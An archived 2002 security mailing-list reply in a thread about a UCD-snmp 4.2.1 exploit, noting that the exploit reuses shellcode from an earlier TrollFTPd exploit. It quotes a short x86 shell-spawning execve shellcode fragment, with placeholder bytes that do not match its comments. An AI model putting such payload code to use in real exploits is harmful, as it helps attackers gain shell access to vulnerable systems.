RE: UCD-snmp 4.2.1 exploit - proof of concept

From: Mike Tone (simpletoneat_private)
Date: Tue Feb 19 2002 - 16:38:23 PST

Next message: knat_private: "Help needed with bufferoverflow in cvs"

Previous message: Peter Boutzev: "buffer overflow in bladeenc"
Maybe in reply to: zenparseat_private: "UCD-snmp 4.2.1 exploit - proof of concept"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

just to note:

The shellcode is exactly the same as that from zen-parse' local exploit
for TrollFTPd (1.26)

see: http://www.securityfocus.com/archive/1/203874

----
"\x68\x55\x55\x55\x55"       // push    dword 68732f6eh
   "\x68\x55\x55\x55\x55"       // push    dword 69622f2fh
   "\x89\xe3"                   // mov     ebx, esp
   "\x51"                       // push    ecx
   "\x53"                       // push ebx
   "\x89\xe1"                   // mov  ecx, esp
   "\xb0\x0b"                   // mov  al, 11
   "\xcd\x80";                  // int     80h
----


---------------------------------------------------------------------
Would you like to receive faxes to your personal email address?
You can with mBox.  Visit http://www.mbox.com.au/fax

Next message: knat_private: "Help needed with bufferoverflow in cvs"
Previous message: Peter Boutzev: "buffer overflow in bladeenc"
Maybe in reply to: zenparseat_private: "UCD-snmp 4.2.1 exploit - proof of concept"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Feb 19 2002 - 22:33:37 PST